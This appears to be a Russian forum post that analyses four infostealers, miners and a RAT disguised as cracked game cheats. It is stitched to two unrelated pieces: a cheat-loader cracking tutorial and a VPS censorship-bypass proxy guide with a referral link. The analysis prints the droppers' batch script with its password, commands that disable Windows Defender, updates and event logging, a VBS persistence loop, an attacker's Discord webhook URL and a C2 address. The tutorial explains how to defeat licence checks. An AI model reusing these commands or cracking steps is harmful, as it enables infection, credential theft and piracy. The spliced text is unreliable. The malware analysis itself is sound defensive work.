Проблема на YouTube и Telegram

Злоумышленники давно уже маскируют вредоносное ПО под видом читов для игр, эта практика началась задолго до CS:GO, еще во времена игр ВКонтакте. Сейчас же они всё так же распространяются, но теперь ещё и под видом самого кряка чита, всё это дело публикуется на платформе YouTube. Они вписывают довольно привлекательную смесь фраз в название ролика, а именно: "Название популярного чита + Crack", чтобы заманивать наивных пользователей.

Для личного удобства перед разбором я буду писать небольшую информацию об авторах вредоносного ПО, пример: [пациент и его номер] - [уровень риска вредоносного ПО].

Уровни риска и что под эту категорию может попасть:
1. Неприятное говно (Низкий опасный потенциал) - потенциально нежелательные программы (PUP), которые не причиняют прямого вреда, но могут быть бесполезны или навязчивы.
2. Опасное говно (Средний опасный потенциал) - вредоносы, собирающие конфиденциальную информацию без ведома пользователя.
3. Деструктивное говно (Высокий опасный потенциал) - удаление важных файлов, отключение компонентов ОС, невозможность загрузки операционной системы, синий экран, зашифрованные данные, ратники

Разбор пациентов

Пациент 1 - Опасное говно (Средний опасный потенциал)

Наш первый пациент является очень хорошим примером того самого душевнобольного, который умудряется делать все платные читы бесплатными, добавляя туда свой подвох, о котором не сообщит вам, распространяя это всё на YouTube (www.youtube.com/@motoboy900) и на свой Telegram-канал (https://t.me/cs2_cheat2).

Также пациент включил смекалку и поместил малварь в 7Zip пакер (https://usbtor.ru/viewtopic.php?t=798), что позволило ему обойти детекты на virustotal.com. На рисунке представлены отношения между файлами, обнаруженными при запуске.

Теперь я распишу за что отвечает каждый файл, представленный на иллюстрации, но более подробно.

1. Cheat Installer - главный файл, который распаковывает остальные файлы в папку AppData/Local/Temp/main, и затем запускает файл main.bat
2. AntiAV.data (AntiAV/AntiAV.bat at master · hXR16F/AntiAV (github.com)) - изначально представляет собою batch-скрипт, который создаёт main.bat и помещает в него код, параллельно добавляя джанк-код и зашифровывает файл.
3. main.bat - "мозг" операции по запуску малваря, чей код представлен ниже:

Код:

mode 65,10
title g3g34g34g34g43 (34g34g45h6hj56j56j)

md extracted

ren file.bin file.zip
call 7z.exe e file.zip -p13917279271825026492155405390 -oextracted

for /l %%i in (11,-1,1) do
(call 7z.exe e extracted/file_%%i.zip -oextracted

ren file.zip file.bin

cd extracted
move "Installer.exe" ../

cd..
rd /s /q extracted

attrib +H "Installer.exe"
start "" "Installer.exe"
echo Launched 'Installer.exe'.
pausedel /f /q "Installer.exe"

Сам алгоритм довольно простой, вначале file.bin переименовывается в file.zip, и начинается процесс распаковки, используя ключ для расшифровки "13917279271825026492155405390". Структура file.zip представляют собой матрешечную вложенность, именно по этой причине здесь используется цикл для распаковки.

После распаковки file.zip обратно переименовывается в file.bin, а Installer.exe получает скрытый атрибут, делая его невидимым в стандартном представлении файловой системы, затем процесс запускается.

4. Installer.exe - вирус, при первом запуске он только инициализирует себя и отключает сервисы.

Первым, что делает вирус, так это выполняет команду в powershell:

Код:

Add-MpReference -ExclusionPath @($env;UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Эта команда добавляет два исключения в Защитник Windows:

• Путь: %UserProfile%
• Путь: %ProgramData%
• Расширение: .exe

Затем наглым образом удаляет обновление KB90830:

Код:

/c wusa /uninstall /kb:890830 /quiet /norestart

Малварь его удаляет не просто так, дело в том, что обновление 90830 связано с установкой средства удаления вредоносного ПО (Windows Malicious Software Removal Tool)

Ко всему прочему он останавливает важные службы
Код:

sc stop UsoSvc - Служба обновления Windows
sc stop WaaSMedicSvc - Служба Центра обновления Windows
sc stop wuauserv - Служба автоматического обновления Windows
sc stop bits - Служба фоновой интеллектуальной передачи данных
sc stop dosvc - Служба DistributedCOM
sc stop eventlog - Служба журнала событий

Похоже, что дело мы имеем с Crypto Silent Miner, на то указывают строки с остановкой служб: https://github.com/UnamSanctam/Sile...lentCryptoMiner/Resources/Code/miner.cpp#L121

Т.к. в реверсе open-source нет никакого смысла, то и продолжать разбирать дальше семпл не стал, но прикола ради я почекал реквест в Pastebin)0 pastebin.com/raw/nG8MdRKS

Пациент 2 - Опасное говно (Средний опасный потенциал)

Следующий пациент с ником lexoff очень хорошо раскачал свой Telegram-канал (t.me/lpsopg), где постит бесплатные читы, и чужие кряки, к которым он сам не имеет никакого отношения. Тем не менее, ему хватает наглости их склеивать со своим малварем и публиковать в открытый доступ.

Разберем его пост с кряком Primordial, к которому опять же, он не имеет никакого отношения, но не стоит удивляться, если пост с примордом пропадет.

Лоадер, как бы это неудивительно не звучало, находится под протектором Enigma с полным пресетом защиты, он проверяет наличие дебаггера, виртуальной машины и целостность (даже имя оригинальное сверяет).

Зачем и что скрывать такому честному человеку? Непонятно, но было бы интересно услышать ответ на это от самого автора канала. Теперь обсудим саму схему работы лоадера, хотя правильнее назвать его дроппером.

Используя песочницу, я обнаружил, что его лоадер создал два исполняемых файла, и затем закрылся.
Если раньше старый лоадер просто дропал Vac Bypass.exe и майнер, то сейчас "новый" лоадер слегка поменял контент, который дроппает пользователю

Для его самых избранных фанатов: архив был скачан прямиком из его телеграм-канала (а именно этот пост: https://t.me/lpsopg/290)

Разберем роль каждого из процессов
1. cli_gui.exe - Обыкновенный лоадер который весит совсем ничего, имеет зачем-то примитивную проверку на отладчик и в целом играет роль LLA инжектора с патчем NtOpenFile.

2. updater.exe - Майнер, который представлен как Microsoft Edge Updater с иконкой браузера и подписью Microsoft.

Updater.exe тоже завершает те же самые службы, что и майнер предыдущего пациента, не трудно догадаться что оба пациента используют одну и ту же пасту, но с разными настройками.

Например, майнер второго пациента использует технику Process Hollowing (What is process hollowing? (techtarget.com)) в замороженный системный процесс dialer.exe, и уже там майнит.

(Забавный факт, но на некоторых LTSC-сборках нет такого системного процесса, и майнер, не зная этого, пытается создать процесс, и с треском проваливается.)

Отдельного внимания стоит то, как именно пациент криптит строки, скрины взяты из его старого лоадера с кряком Inuria:

Он палит аргумент с голой строкой в функции, которая её криптит, и затем после полученной зашифрованной строки начинает сразу же её дексорить))00 Шифрование 10 из 10.

К сожалению, админ этого канала отказался признавать наличие малваря в своих публикациях и не захотел вести со мной адекватный диалог, поэтому рофлан поминки, идём дальше.

Надеемся, что админ канала исправится и прекратит постить говно для своей аудитории! (Не перестанет, схавают же)

Обновлено:
Появился пост где он опубликовал склеенный Luno чит со своим майнером (https://t.me/lpsopg/291), разницы с прошлым лоадером приморда буквально 0. Вот что пациент ответил на предъявы с детектами:

Лоадер оригинального Luno Free не превышает 1мб, а файл, который предоставляет пациент весит аж 11мб

Пациент 3 - Деструктивное говно (Высокий опасный потенциал)

Теперь перейдем к более серьезным малварям. На очереди у нас человек, сумевший крякнуть миднайт, и выложить готовый лоадер, который выглядит 1 в 1 как оригинальный лоадер.

Оказалось, что файл этот был написан на C#, и накрыт видоизменённым обфускатором Confuser Core 1.5.0, что доставило мне не мало проблем позже при деобфускации файла.

Первичный анализ

Во время статического анализа я заметил, что de4dot не смог распознать этот обфускатор, поэтому пришлось смотреть вручную листинг в dnSpy

Далее я полистал названия классов и обнаружил кучу пустых методов, было ясно, что это слегка видоизмененный Confuser.Core, например то же шифрование строк поменялось в лучшую сторону, да так, что ни одна паблик тулза не хотела фиксить это.

Убираем AntiTamper

Чтобы была возможность трассировать уже деобфусцированный код, нам нужно снять анти-тампер с файла, который инициализируется первым в программе, если его пропатчить до того, как он вызовется, то в последующем программа просто крашнет.

Сама цель АнтиТампера распределена на несколько этапов, а именно:
1. Поиск зашифрованного блока данных: АнтиТампер сканирует заголовки и секции файла, чтобы найти нужный ему блок данных, который изначально зашифрован в файле.
2. Дешифрование этих данных: Найденный блок данных дешифруется используя CryptoStream и XOR.
3. Проверка целостности данных: Вычисляется MD5-хэш уже дешифрованных данных и затем этот хэш сравнивается с контрольной суммой, вшитой в модуль.
4. Запись дешифрованных данных в память: Если хэши совпадают, дешифрованные данные записываются обратно в память модуля.

Избавиться от анти-тампера оказалось проще простого, во время работы программы проверка целостности ни разу не будет вызвана, это означает, что можно затереть вызов инициализации анти-тампера сразу же после его выполнения и сдампить модуль.

Слабое обнаружение VM/SandBox

После того, как я привел файл в более читабельный файл и избавился от антитампера, я принялся анализировать работу малваря.

Для начала, он проверяет, находится ли жертва под виртуальной машиной, в частности под VirtualBOX, он обращается к WMIC (Select * from Win32_ComputerSystem), в полученном результате он пытается найти слово 'virtual'. затем после удачной проверки он обращается снова к WMIC, забирая имя дисплея, и в последующем пытаясь найти слово 'basic' в нём.

И финальная проверка в методе заключается в проверке кол-во кэш-памяти, для того чтобы функция вернула false, она должна найти больше двух кэш-памяти.

Помимо этого, были еще различные методы проверки на наличие песочницы, такие как проверка на наличие модуля SbieDll.dll, что довольно неактуально на 2024 год.

Инициализация малваря

Файл создаёт директорию WindowdDebug со скрытым атрибутом, записывая туда файл с именем svchost.exe.

Перед его запуском, он записывает данные в реестр по пути {HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows} со строкой: Load "C:\\Windows\\WindowdDebug\\svchost.exe"

Когда все файлы подготовлены, исполняемый файл удаляет себя batch-скриптом, который он подготовил заранее:
Код:

chcp 65001
timeout 2 > NUL
DEL "C:\Users\57\Desktop\123.exe" /f /q
CD C:\Users\57\AppData\Local\Temp\
DEL "tmpBE3.tmp.bat" /f /q

Реестр

Перезаписанный исполняемый файл повторяет те же самые процедуры, что и его предшественник, с небольшими изменениями, именно тут он начинает полностью функционировать.

Исполняемый файл изменяет ветвь реестра HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System, устанавливая значения DisableTaskMgr в 1, а EnableLUA в 0. Это отключает диспетчер задач, что затрудняет рядовым пользователям удалить вредонос. Кроме того, оно отключает уведомления контроля учетных записей (UAC), которые предупреждают пользователей о попытках исполняемых файлов установить программное обеспечение или внести изменения в систему.

Под раздачу попали и FirewallEnable с DisableAntiSpyware, выключая брандмауэр и защитник Windows.

Авто-поднятие малваря

Исполняемый файл создаёт в папке Temp скрипт script.vbs, и заполняет его кодом:

Код:

On Error Resume Next
Do while true
CreateObject("WScript.Shell").Exec "C:\Windows\WindowdDebug\svchost.exe"
WScript.Sleep(10000)
Loop

Скрипт автоматически запускает исполняемый файл каждые десять секунд, если обнаруживается копия запущенного процесса, она завершается.

Сам вирус тоже отслеживает работу wscript с помощью отдельного потока, чтобы предотвратить его закрытие.

Winlocker + CelestialRAT

Оказалось, что ко всему прочему, тут был и Winlocker, но он по неизвестной мне причине отказывался появляться на экране, несмотря на то, что инициализация формы (инициализация кнопок, текста, панелей) проходила, и мимо пролетали такие строки, как "Windows Заблокирован", "Attempts", "Unlock Windows":

В дальнейшем, анализ показал наличие не только наличие граббера и винлокера, но и полноценного ратника Celestial RAT, о чем свидетельствует использование характерного имени файла при создании архива, а сам метод создания показан на скриншоте:

При первой отправке логов граббер старается унести важные файлы, которые так или иначе светят слово 'license', так он забрал файлы лицензии de4dot.

Вот как выглядит первый лог:
Код:

ZipFile:
Comment:
CelestialRAT - log (RU)

/ System \\
Date: 2024-04-04 10:41:59
ComputerName: KOMPUTER
UserName: 57
Language: ru-RU

/ Hardware \\
GPU: Penis
CPU: AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor           
RAM Amount: 8191MB
Screen Metrics: 3238x1280
uses ZIP64: False
disk with CD: 0
CD offset: 0x00000000

Затем граббер начинает проверять наличие важных сессий у зараженной жертвы, такие как телеграм сессии, дискорд-токен, и пароли, куки и отправляет уже второй лог, используя веб-хук дискорда:
Код:

"Celestial RAT / A New log arrived.
Client time: 2024-04-04 10:41:59
Country: RU (-)
UserName: 57
MachineName: KOMPUTER
GPU: Penis
CPU: AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor           
RAM: 8191MB
System: Windows 10 Enterprise LTSC 2021 64-bit (OS Build 19044)
Screen: 3238x1280
-------------------------------------------------
Passwords : 0
Cookies : 0
Autofills : 0
Discord tokens : 0
Wallets : 0
Filezilla hosts : 0
Telegram sessions : 0
-------------------------------------------------Password:-"

Сам метод отправки через веб-хук выглядит так:

А, ну и по классике сам вебхук того, кто распространяет вредонос - "https://discord.com/api/webhooks/1218742675298189493/LGP6NKebRjk45CruPCEM6WhUQ-uABkvX-jZS9LV1s4Kl5BmIeSxtvSRfz3UHDIMrxces"

Пациент 4 - Неприятное говно (Низкий опасный потенциал)

Четвёртый пациент на своём ютуб-канале публикует стиллер, написанный на C++ и сразу скажу, что исполняемый файл для хранения информации о пользователе использует локальную базу данных - sqlite3 и архивирует все это дело через ZLib, и всё это подносится, опять же, под видом крякнутого миднайта.

Исполняемый файл никак не пытается защитить себя от обнаружения, он не запакован чем-либо, не пытается обнаружить виртуальную машину или отладчик, не добавляется в автозагрузку. ничего кроме шифрования строк оно не использует, но опять же, даже при статическом анализе в дизассемблере всё становится очевидным.

Первый запуск

Для начала после вызова main функции, исполняемый файл создает мьютекс и ждёт пока пользователь нажмёт кнопку Escape. После нажатия вирус получает путь до папки Temp, чтобы хранить там базу данных. Затем начинает воровать у пользователя данные.

Если говорить о том что именно он ворует, то тут дефолтный набор стиллера:

• Скриншот - Делается первым же делом после создания мьютекса и прожатия клавиши, сохраняя название файла как 'Desktop.jpg'.
• Steam - Обращается в реестр по пути "Software\Valve\Steam\AutoLoginUser", если такой путь есть и удается прочитать имя, то следующим делом он получает путь до папки стима, проверяет наличие таких файлов, как: "loginusers.vdf", "config.vdf", "ssfn", при наличии копирует их к себе.
• FileZilla - Проверяет наличие папки с таким названием, в случае наличия читает файл recentserver.xml и сохраняет к себе поля "Host", "User", "Pass", "Port".
• VPN - Проверят наличие папки NordVPN и OpenVPN, если нашел NordVPN, то читает и копирует user.config "//setting[@name='Username']/value", "//setting[@name='Password']/value". Если нашел OpenVPN, то читает файлы ".ovpn".
• Discord - Читает файл по пути "discord/Local Storage/leveldb", и в нем ищет упоминание слова "token".
• Telegram - Копирует всё содержимое из Telegram Desktop/tdata к себе.
• Desktop Files - Ищет на рабочем столе расширение "lua", "cpp", "h", "hpp", "doc", "docx" и копирует их к себе.

Непредусмотрительность разработчикаПо сути, анализировать то особо нечего, но есть одна неприятная бага для разработчика.

В исполняемом файле есть функция, назовём её "getFilesFromDirectories", она представляет собой алгоритм поиска файлов в указанных директориях, включая все вложенные директории. Для этого она использует рекурсивный подход, т.е. когда функция находит директорию, она вызывает сама себя, передавая новый путь к директории в качестве аргумента. Это позволяет ей проходить по всей вложенной иерархии директорий и искать файлы во всех из них.

Причина по которой этому вирусу была выдана низкая опасная потенциальность взаимосвязана с этой функцией. Дело в том, что функция вне своей рекурсии вызывается два раза, для поиска файлов в папке Roaming и Local.

Первый вызов обходится без проблем, но вызов второй функции буквально останавливает программу, причем буквально, в моем случае функция вызвала себя 205 раз, и на 206 полностью перестала функционировать, трассировка же просто показывала, что сейчас EIP находится на одном из экспортов ntdll функции, и выходом из ситуация был только перезапуск вируса.

Из-за этой проблемы, вирус не в состоянии был отправить логи на сервер.

Функция "getFilesFromDirectories" является лишь верхушкой айсберга, когда я снимал трассировку, я заметил, что последними вызываемыми функциями были OpenProcess и NtQueryObject.

Функция действительно имеет отдельный метод для этого, назовём его getMemoryCookies, по псевдо этой функции можно понять, что она проходится по всем процессам, и пытается найти в их памяти упоминание куки-файлов, вызывая функцию isNetworkCookieObject.

Псевдо isNetworkCookieObject:

И так как getMemoryCookies в цикле проходится по всем процессам, то нужно было понять, на каком процессе именно происходит зависание программы. Во время трассировки я обнаружил, что во время зависания в OpenProcess лежал процесс айди моего браузера., но я не успел узнать на какой функции именно произошло зависание, поэтому я накидал лёгкий скрипт, который проверял процесс айди моего браузера с аргументом в OpenProcess:
Perl:

$handleCounter = 0
$currentProcId = 0

addr = 008AF941
bp addr
SetBreakpointCommand addr, "scriptcmd call check_proc_id"
ret

check_proc_id:
$currentProcId = arg.get(1)
log "OpenProcess({$currentProcId})"
cmp $currentProcId, 0x6C0
je found
erun
ret

found:
inc $handleCounter
cmp $handleCounter, 4
je found2
erun
ret

found2:
msg "gay found"
ret

знаю, что я мог просто добавить условие бряка по другому, облегчив себе немного жизнь, но я чет забыл про это)0

Так вот, попав в момент, когда малварь начал сканировать msedge.exe, я начал трассировать, и дошел до функции isNetworkCookieObject, где фигурируют два вызова NtQueryObject.

Один вернул мне 0xC0000004 (STATUS_LENGTH_MISMATCH), а второй вызов дедлокнул поток, на месте самого разработчика я бы выносил эту функцию в отдельный поток, да бы она не препятствовала работе основного потока.

Подробнее про NtQueryObject и причину дедлока можете почитать на этих источниках:
https://wasm.in/threads/vopros-po-ntqueryobject-deadlock.678

NtQueryObject виснет намертво :-\ -> Форум на Исходниках.Ру (sources.ru)
NtQueryObject и W2K3 - в чем там проблема? - Низкоуровневое программирование - RSDN

А если вкратце, то причина дедлока может быть разной, одна из версий гласит про запрет использования специальных именованных пайп-каналов, которая и приводит к дедлоку.

Отправка логов на сервер

Занопав функцию, которая мешала мне, малварь начал подготовку отправки логов на сервер, что для начала идёт подсчёт количество собранной информации - пароли, куки, автозаполнения, и прочая информация, по типу винды, оперативы, гпу, цпу и тд.

Затем происходит подключение к 109.94.208.20, и начинает соединять всю собранную информацию в одну строку:
Код:

- Passwords: 0
- Cookies: 0
- Autofill: 0
- Cards: 0
- Files: 1
- BuildTag: midnight ; Т.к. наш юзер распространяет этот малварь под разными читами, то в логе он помечает с какого именно псевдо-чита он заразил пользователя, мой семпл, например, был якобы кряком миднайта.
- PC Hash: e4379b4b38e56460add653458a687e0f
- UserID: 1191696757
- Windows: 10
- Windows Username: 57
- RAM: 8191 MB
- GPU: Penis
- CPU: AMD Ryzen 5 3600 6-Core Processor           
- HWID: {58007656-f0da-11ee-ba17-806e6f6e6963}
- ScreenSize: 3238x1280
- BuildPath: C:\Users\57\Desktop\Midnight Loader.exe

И вся это строка проходится по довольно банальной шифровке -> base64.

На выходе мы получаем такую строчку:
Код:

LSBQYXNzd29yZHM6IDAKLSBDb29raWVzOiAwCi0gQXV0b2ZpbGw6IDAKLSBDYXJkczogMAotIEZpbGVzOiAxCi0gQnVpbGRUYWc6IG1pZG5pZ2h0Ci0gUEMgSGFzaDogZTQzNzliNGIzOGU1NjQ2MGFkZDY1MzQ1OGE2ODdlMGYKLSBVc2VySUQ6IDExOTE2OTY3NTcKLSBXaW5kb3dzOiAxMAotIFdpbmRvd3MgVXNlcm5hbWU6IDU3Ci0gUkFNOiA4MTkxIE1CCi0gR1BVOiBQZW5pcwotIENQVTogQU1EIFJ5emVuIDUgMzYwMCA2LUNvcmUgUHJvY2Vzc29yICAgICAgICAgICAgICAKLSBIV0lEOiB7NTgwMDc2NTYtZjBkYS0xMWVlLWJhMTctODA2ZTZmNmU2OTYzfQotIFNjcmVlblNpemU6IDMyMzh4MTI4MAotIEJ1aWxkUGF0aDogQzpcVXNlcnNcNTdcRGVza3RvcFxNaWRuaWdodCBMb2FkZXIuZXhl

Отправляя её, следом отправляется и следующий пакет, содержащий архив с нашими данными, указатель которой находится в выделенной памяти, вот как выглядит архив:

Заключение

К сожалению, на сегодняшний день очень много людей, которые не проверяют файлы на наличие вирусов и верят всему подряд, пользуйтесь действительно проверенными временем источниками, такими как Underical или ExLoader, берегите себя!

По пунктам
1. Берем лоадер и и детектим либу, для этого мы перекидываем лоадер в прогу Detect Is Easy

Что мы видим?
Шикарная вещь, .NET(бла бла), это короче очень крутая тема, кому я это вообще объясняю? Те кто знают, те знают, остальные загуглят.

2. Короче, мы поняли, прога написана на шарпе, все круто, открываем настоящий ужас, программу dnSpy

Скорее всего, открыв ее в первый раз, вы испугаетесь цифорок, буковок и закроете ее.
По итогу, собравшись с силами вы все таки откроете эту программу и поймете, страшного в ней ничего нет. Давайте подумаем, как работает самый просто лаунчер чита? Полюбому они не будут все аккаунты и тп. Хранить в своей базе данных, а будут использовать готовый апи, наверное самый популярный будет KeyAuth.
В левой панеле элементов, находим перекинутый лаунчер в нашу прогу,

После чего тыкаем на треугольник слева и у нас открывается, много новых кнопок с картинками, нам надо то, что отвечает за авторизацию и основной код программы, тыкаем сюда

жмем треугольник и у нас открывается еще больше кнопочек, нам надо найти то, где хранится HWID привязка, находится она как не странно в кнопке с названием Login!

Тыкаем на нее и у вас откроется код слева, круто думаете вы, сейчас примените свои знания паскаля из школьной программы, но не тут то было, вы осознаете, что код на с#!
Ищем строку отвечающую за панель управления:

Там у вас будет немного по другому, я просто решил, что будет гуманно, если я не буду показывать эти данные, короче все очень просто, вы регаетесь на сайте KeyAuth, создаете свою панель и вписываете уже ваши данные сюда, после чего компилим код и получаем, что лаунчер привязан к вашей панеле, круто, вы кул хацкеры, если вам этого достаточно, можете закрывать тему.

Теперь пришло время для более крутых людей, которые хотят получить дллку.
Тут все еще проще, ищем основное окно, чаще всего main

Тут находим кнопочку, отвечающую за инжект, обычно после нажатия на такую кнопочку, идет подгрузка файлика с дллкой на ваш пк, вам остается лишь найти ссылку на этот файлик.
Короче тыкаем на кнопочку inject

И видим еще куча кода, ищем прямую ссылку на нашу дллку, ее можно найти и с помощью wireshark, после проделанной нами 1 части, но мне удобнее вот так, короче вот наша ссылка ниже, но перед ней вы увидете такой страшный кусок кода, как WebClient, если вы такое нашли, то вы на правильном пути.

Мы короче качаем нашу дллку, еще как вариант, можно перехватить дллку, во время ее инжекта, заморозив прогу через процесс хакер, заранее при этом нужно найти путь, куда она сохраняется,

Вам остается лишь забрать дллку из этой директории.
3. Вы выдохнули и подумали, что ваши мучения кончились, предположим вам захотелось показать какой вы крутой и поменять название чита на ваш никнейм Майнкрафтер2014, и для этого нам нужен реальный ужас, программа с тремя головами!

Идой я не пользуюсь, мне она не нрав, так что да…
Вот, обьяснять че в ней происходит я не буду, просто говорю куда тыкать и самое главное давайте представим, что эта дллка не защищена темидой или вмп, так как обьснять как дампить вма мне лень, так что если там протектор, то не судьба… вы все равно не поймете че в этой проге написано поэтому говорю, что делаем, закидываем файл, анализируем, тыкаем на Search, потом Program Text

Ищем название чита, выбрав поля

жмем Search (с англ. - Поиск)
Находим строку с нашим названием в окне дизассемблера( это короче окошко слева ) это типо вот так будет выглядить

, мы тыкаем по этой штуки правой кнопкой мыши и жмем clear bytes, видим какие то цифры, с буквами, че за ужас думаете вы

теперь нам требуется 5 пункт, а именно iq>50 , ищем в инете string to bytes, вводим нужное название и получаем байтики, справа у вас есть менюшка редактора хекса(цифорки там разные), тыкаете на карандашик и теперь цифорки можно редактировать, вы тыкаете на нужную вам буковку и попадаете в хексе, на ее байты, их заменяете на нужные вам байты, типо вот так

На выходе получаем че то типо

Экспортируем вашу дллку, меняем формат на аси, или просто инжектим в игру и радуемся.

1. Не компрометировать VPS протоколами, которые могут быть детектированы (не ставить туда WireGuard, OpenVPN, Shadowsocks, ...). Некоторые провайдеры блокируют VPS, на которых в прошлом были замечены подобные протоколы.
2. Не ходить в рунет через VPS, вместо этого посещать рунет напрямую, мимо прокси (легко настроить). В крайнем случае, пускать российский трафик по цепочке Я->VPS->Warp->Рунет (это тоже легко настроить). Дело в том, что если трафик пересекает границу РФ дважды в условную секунду (сначала туда, потом сразу обратно), то цензор может заподозрить прокси и заблокировать его. В Китае так делают, у нас - нет, но могут научиться в любой момент.
3. Не раздавать доступ к проксибольшому количеству людей. 5-10 близких максимум. В Китае вычисляют аномальный трафик к серверу от большого числа юзеров (и блокируют сервер), наше провайдеры могут перенять их опыт в любой момент.

При выполнении этих условий (в текущих реалиях) доступ к серверу невозможно отключить. Однако, я люблю избыточную надёжность, поэтому... на случай неожиданной блокировки VPS‑сервера по IP — есть «План Б»: проксирование трафика через CDN (Content Delivery Network).CDN CloudFlare

CDN созданы для балансировки трафика крупных сайтов, состоят из сотен IP‑адресов, поэтому шанс их блокировки в РФ минимальный. Я использую одну из самых крупных CDN в мире — CloudFlare с бесплатным тарифом. Именно к CloudFlare вы привяжете купленный домен, чтобы пускать трафик через него.
Проксирование через CDN чуть медленнее прямого коннекта к серверу. Зато, при использовании CDN, Роскомнадзор вообще не узнает IP вашего сервера.

CloudFlare Warp
Warp - это сеть публичных прокси от той же корпорации CloudFlare, доступ туда происходит по VPN-протоколу WireGuard. Из РФ к Warp-у, конечно же не подключишься, но из зарубежного VPS - запросто.
В этой схеме Warp исполняет две функции:

1. Дополнительный инструмент для обхода западной цензуры (если некоторые западные сайты не приветствуют запросы с вашего VPS - вы сможете зайти на них через Warp)
2. Доп. защита от блокировок: проксирование запросов от VPS в Рунет, чтобы не компрометировать VPS в глазах РКН. Это на случай, если вы не настроили клиентское приложение для прямого доступа в ru-ресурсам. Конечно, не все ru-сайты готовы обслуживать запросы из-за границы, например: сайт Почты России почти наверняка не откроется через Warp, но большинство ru-сайтов откроется.

Независимость от корпораций
Если CloudFlare вдруг исчезнет, вся схема продолжит работать напрямую, при этом останется возможность подключиться к любой другой CDN (из десятки), а вместо Warp использовать любой другой зарубежный прокси. Но пока всё работает - можно использовать CloudFlare.
На этом теория окончена, перехожу к инструкции.
Говоря о том, что нам там предлагают под наши цели — это виртуальные VPS сервера, расположенные в странах европы, России и США. С реальной скоростью соединения с сервером примерно 500 мбит/с и безлимитным трафиком (что очень важно для VPN сервера) . Лично я буду использовать хостера Aeza - дешевый и относительно стабильный, с нормальными хар-ми сервера.
Итак, если вы, всё-таки решили арендовать сервер у Аезы, а не пошли писать гневные комментарии под моим постом этому поводу, то алгоритм действий такой:
1. Для начала вам нужно перейти по этой ссылке зарегистрироваться, и перейти в личный кабинет.
2. Далее, нажмите на Виртуальный сервер, выберите нужную страну, тариф Shared и минимальную конфигурацию сервера.

3. На наш сервер нужно установить операционную систему Debian 12— её и выберите. Отключите бекапы — тут они не нужны (в случае чего всё можно быстро переустановить) . Выберите период оплаты и, собственно, оплатите аренду.

Кстати, после регистрации по моей реферальной ссылке у вас в течении 24 часов будет бонус 15% к пополнению баланса.

Минуты 2-3 сервер будет активироватьсяи после на почту придут данные для авторизации для подключения к серверу. Либо, ip-адрес и пароль можно будет посмотреть в разделе мои услуги и нажать на название вашего сервера.

Инструкция (1/6) - настройка VPS

Как только вы приобрели VPS‑сервер с уже установленной туда чистой Debian 12 — как правило в течении нескольких минут провайдер выдаст вам доступ к серверу. Чаще всего приходит e‑mail, иногда данные можно найти в панели.
В моем случае с aeza - данные есть и на почте и в личном кабинете.

Вам нужны две строки: IP-адрес и root-пароль

Шаг 1: Подключитесь к серверу по SSH:

• Наберите ssh root@111.111.111.111 в консоли (IP поменяйте на свой).

Пароль можно вставить из буфера с помощью ПКМ, он не отображается для безопасности. Иногда пароль вставляется корректно только при включённой английской раскладке клавиатуры.

• Либо используйте веб-интерфейс "VNC" в панели VPS
• Либо используйте какое-либо SSH-приложение (подойдет командная строка)

Шаг 2: Обновите систему на сервере

apt update && apt full-upgrade -y

(займёт несколько минут)
Шаг 3: Перезагрузитесь reboot и через минуту подключитесь по ssh заново.
Шаг 4:Установите необходимые пакеты:

apt install

Docker: Accelerated Container Application DevelopmentDocker is a platform designed to help developers build, share, and run container applications. We handle the tedious setup, so you can focus on the code.docker.iodocker-compose git curl bash openssl nano -y

Шаг 5: Установите панель 3X-UI версии v2.0.2:

git clone https://github.com/MHSanaei/3x-ui.git
cd 3x-ui
nano docker-compose.yml
# откроется текстовой редактор.
# в 6 строке замените "latest" на "v2.0.2"
# было: image:

Package 3x-ui · GitHubGitHub is where people build software. More than 100 million people use GitHub to discover, fork, and contribute to over 420 million projects.ghcr.io
# стало: image:

Package 3x-ui · GitHubGitHub is where people build software. More than 100 million people use GitHub to discover, fork, and contribute to over 420 million projects.ghcr.io
# чтобы сохранится, нажмите: CTRL+X, Y, ENTER
docker-compose up -d

Важно

Шаг 6:Установите Warp: первой командой - удалите (если он был установлен хостером), второй - установите его в режиме совместимости с 3x-ui

warp u
bash <(curl -sSL https://raw.githubusercontent.com/hamid-gh98/x-ui-scripts/main/install_warp_proxy.sh)

Во время установки скрипт спросит у вас цифру, нужно ответить 40000
Шаг 7: Сгенерируйте самоподписанный TLS-сертификат и скопируйте его в панель 3X-UI

openssl req -x509 -newkey rsa:4096 -nodes -sha256 -keyout private.key -out public.key -days 3650 -subj "/CN=APP"
docker cp private.key 3x-ui:private.key
docker cp public.key 3x-ui:public.key

На этом настройка сервера завершена.
Можно шаманить дальше, чтобы повышать уровень безопасности сервера и качество его маскировки, но «для старта» я считаю это излишним. Минимально необходимые настройки для стабильной работы сервера вы выполнили.Инструкция (2/6) - первичная настройка панели 3X-UI

Шаг 1: Откройте браузер и зайдите по адресу вида http://111.111.111.111:2053/ Обратите внимание на http (не https) в начале адреса (но это только на старте, далее будет https). IP, конечно, нужно поменять на свой.

Шаг 2: Поменяйте язык на английский (в русском кривой перевод), тёмную тему, логин: admin, пароль: admin, и войти (кнопка Login).

Шаг 3: В разделе "Panel Settings" заполните 4 поля как на скриншоте:

- Panel Port (любое случайное число от 1000 до 65535, кроме 40000 - оно уже занято варпом, в инструкции я буду использовать 54321 - но вы придумайте своё). Далее везде вместо порта 54321 вставляйте своё число.
- Panel Certificate Public Key Path : /public.key
- Panel Certificate Private Key Path : /private.key
- Panel URL Root Path: секретная строка для доступа к панели, которая начинается и заканчивается "/". Я использую /mysecreturl/, но вы придумайте свою. Далее везде вместо строки /mysecreturl/используйте свою.
Наконец, сохранитесь (кнопка Save вверху страницы) и обязательно перезагрузите панель (кнопка Restart Panel, Sure).

• Браузер выдаст ошибку. Поменяйте в адресной строке порт 2053 на 54321, обновите страницу.
• Браузер выдаст вторую ошибку«Подключение не защищено» (это потому что мы используем самоподписанный сертификат, но это временно). Нажмите на Дополнительно→Перейти на сайт, и вы опять окажетесь в панели.

